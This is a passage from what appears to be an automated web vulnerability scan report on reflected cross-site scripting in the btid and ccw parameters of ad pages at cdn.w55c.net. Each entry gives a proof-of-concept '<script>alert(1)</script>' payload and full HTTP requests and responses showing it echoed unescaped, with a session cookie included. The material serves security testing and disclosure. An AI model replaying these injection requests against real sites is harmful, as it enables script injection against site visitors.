6.78. http://cdn.w55c.net/i/0RilLTaqf1_958911823.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RilLTaqf1_958911823.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae0e"><script>alert(1)</script>a3c085132ed was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RilLTaqf1_958911823.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=7ae0e"><script>alert(1)</script>a3c085132ed&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRU9gAKcZcK7GWLyoFKWsZOaIGHRR4fdymMmw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZTb3MxV1lvZQ&ciu=MFJpbExUYXFmMQ&reqid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=611&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681865&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663865478&bpp=16&shv=r20110420&jsv=r20110415&correlator=1303663865496&frm=1&adk=2614322350&ga_vid=1538346491.1303663866&ga_sid=1303663866&ga_hid=2007194349&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=121
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:56:30 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 06 Apr 2011 17:50:22 GMT
Date: Sun, 24 Apr 2011 16:50:11 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 904

<IFRAME SRC="http://ad.doubleclick.net/adi/N4637.158901.6939390485621/B5385253.8;sz=160x600;pc=[TPAS_ID];ord=7ae0e"><script>alert(1)</script>a3c085132ed?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
...[SNIP]...

6.79. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RkPQrQRFy_1341446950.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0ae7"><script>alert(1)</script>fc644e975d8 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RkPQrQRFy_1341446950.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=c0ae7"><script>alert(1)</script>fc644e975d8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEYzTllTc2l3dw&ciu=MFJrUFFyUVJGeQ&reqid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=138&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676403&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658403541&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658403548&frm=1&adk=513358139&ga_vid=764788207.1303658404&ga_sid=1303658404&ga_hid=1212953574&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:33 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:14:45 GMT
Accept-Ranges: bytes
Last-Modified: Fri, 01 Apr 2011 14:32:11 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 866

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6;sz=728x90;pc=[TPAS_ID];ord=c0ae7"><script>alert(1)</script>fc644e975d8?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
...[SNIP]...

6.80. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RkPQrQRFy_1341446950.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78459"><script>alert(1)</script>f0b05869bbc was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RkPQrQRFy_1341446950.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy78459"><script>alert(1)</script>f0b05869bbc&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEYzTllTc2l3dw&ciu=MFJrUFFyUVJGeQ&reqid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=138&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676403&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658403541&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658403548&frm=1&adk=513358139&ga_vid=764788207.1303658404&ga_sid=1303658404&ga_hid=1212953574&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:32 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Fri, 01 Apr 2011 14:32:11 GMT
Date: Sun, 24 Apr 2011 15:20:23 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1410

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQ
...[SNIP]...
N553.158901.DATAXU/B5114832.6;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy78459"><script>alert(1)</script>f0b05869bbc?">
...[SNIP]...

6.81. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fab1"><script>alert(1)</script>32fd7cc17d7 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=3fab1"><script>alert(1)</script>32fd7cc17d7&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:04 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 420
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061007 (MII-APC/1.6)
Content-Length: 1698

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...
ZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=3fab1"><script>alert(1)</script>32fd7cc17d7?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
...[SNIP]...

6.82. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbaf0"><script>alert(1)</script>b3a155594fa was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nwdbaf0"><script>alert(1)</script>b3a155594fa&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:03 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 419
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061002 (MII-APC/1.6)
Content-Length: 2346

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...
&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nwdbaf0"><script>alert(1)</script>b3a155594fa?">
...[SNIP]...

6.83. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [ccw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the ccw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2f61"><script>alert(1)</script>42bb6a3d738 was submitted in the ccw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=f2f61"><script>alert(1)</script>42bb6a3d738&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:14 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 430
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061003 (MII-APC/1.6)
Content-Length: 2124

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=f2f61"><script>alert(1)</script>42bb6a3d738&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh
...[SNIP]...

6.84. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [ccw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the ccw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92c7"><script>alert(1)</script>e45bffd3462 was submitted in the ccw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4b92c7"><script>alert(1)</script>e45bffd3462&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:13 GMT
Cache-Control: no-cache, no-store
content-type: text/html
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 429
pragma: no-cache
Via: 1.1 mdw061005 (MII-APC/1.6)
Content-Length: 2260

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...
